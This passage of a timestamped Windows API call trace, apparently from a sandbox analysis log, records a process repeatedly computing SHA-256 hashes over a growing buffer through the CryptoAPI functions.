hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.964] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321be0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321be0, pdwDataLen=0x12e8b8) returned 1 [0230.964] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.964] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.964] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.965] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.965] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0230.965] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.965] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321490, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321490, pdwDataLen=0x12e8b8) returned 1 [0230.965] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.965] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.965] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.965] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.965] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0230.965] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.965] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x322fa0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x322fa0, pdwDataLen=0x12e8b8) returned 1 [0230.965] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.965] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.965] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.966] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.966] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0230.966] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.966] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323000, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323000, pdwDataLen=0x12e8b8) returned 1 [0230.966] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.966] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.966] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.966] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.966] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0230.966] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.966] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323030, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323030, pdwDataLen=0x12e8b8) returned 1 [0230.966] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.966] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.966] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.967] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.967] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0230.967] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.967] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323060, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323060, pdwDataLen=0x12e8b8) returned 1 [0230.967] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.967] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.967] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.967] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.967] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0230.967] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.967] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323090, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323090, pdwDataLen=0x12e8b8) returned 1 [0230.967] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.967] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.967] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.968] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.968] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0230.968] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.968] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3230c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3230c0, pdwDataLen=0x12e8b8) returned 1 [0230.968] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.968] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.968] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.968] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.968] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0230.968] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.969] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3230f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3230f0, pdwDataLen=0x12e8b8) returned 1 [0230.969] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.969] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.969] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.969] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.969] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0230.969] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.969] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323120, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323120, pdwDataLen=0x12e8b8) returned 1 [0230.969] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.969] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.969] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.970] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.970] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0230.970] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.970] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323150, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323150, pdwDataLen=0x12e8b8) returned 1 [0230.970] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.970] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.970] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.970] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.970] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0230.970] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.970] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323180, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323180, pdwDataLen=0x12e8b8) returned 1 [0230.970] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.970] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.970] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.971] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.971] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0230.971] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.971] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3231b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3231b0, pdwDataLen=0x12e8b8) returned 1 [0230.971] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.971] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.971] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.971] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.971] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0230.971] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.971] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3231e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3231e0, pdwDataLen=0x12e8b8) returned 1 [0230.971] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.971] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.971] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.972] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.972] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0230.972] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.972] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323210, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323210, pdwDataLen=0x12e8b8) returned 1 [0230.972] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.972] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.972] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.972] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.972] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0230.972] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.972] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323240, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323240, pdwDataLen=0x12e8b8) returned 1 [0230.972] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.972] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.972] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.973] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.973] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0230.973] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.973] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323270, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323270, pdwDataLen=0x12e8b8) returned 1 [0230.973] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.973] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.973] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.973] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.973] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0230.973] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.973] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3232a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3232a0, pdwDataLen=0x12e8b8) returned 1 [0230.973] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.973] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.973] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.974] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.974] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0230.974] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.974] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3232d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3232d0, pdwDataLen=0x12e8b8) returned 1 [0230.974] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.974] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.974] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.974] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.974] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0230.974] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.975] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323300, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323300, pdwDataLen=0x12e8b8) returned 1 [0230.975] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.975] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.975] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.975] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.975] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0230.975] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.975] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323330, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323330, pdwDataLen=0x12e8b8) returned 1 [0230.975] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.975] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.975] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.976] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.976] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0230.976] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.976] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323360, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323360, pdwDataLen=0x12e8b8) returned 1 [0230.976] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.976] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.976] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.976] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.976] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0230.976] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.977] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323390, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323390, pdwDataLen=0x12e8b8) returned 1 [0230.977] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.977] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.977] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.977] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.977] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0230.977] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.977] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3233c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3233c0, pdwDataLen=0x12e8b8) returned 1 [0230.977] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.977] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.977] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.978] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.978] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0230.978] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.978] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3233f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3233f0, pdwDataLen=0x12e8b8) returned 1 [0230.978] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.978] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.978] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.978] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.978] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0230.978] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.978] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323420, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323420, pdwDataLen=0x12e8b8) returned 1 [0230.978] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.978] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.978] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.979] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.979] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0230.979] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.979] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323450, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323450, pdwDataLen=0x12e8b8) returned 1 [0230.979] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.979] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.979] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.979] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.979] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0230.979] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.980] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323480, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323480, pdwDataLen=0x12e8b8) returned 1 [0230.980] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.980] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.980] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.980] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.980] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0230.980] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.980] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3234b0, 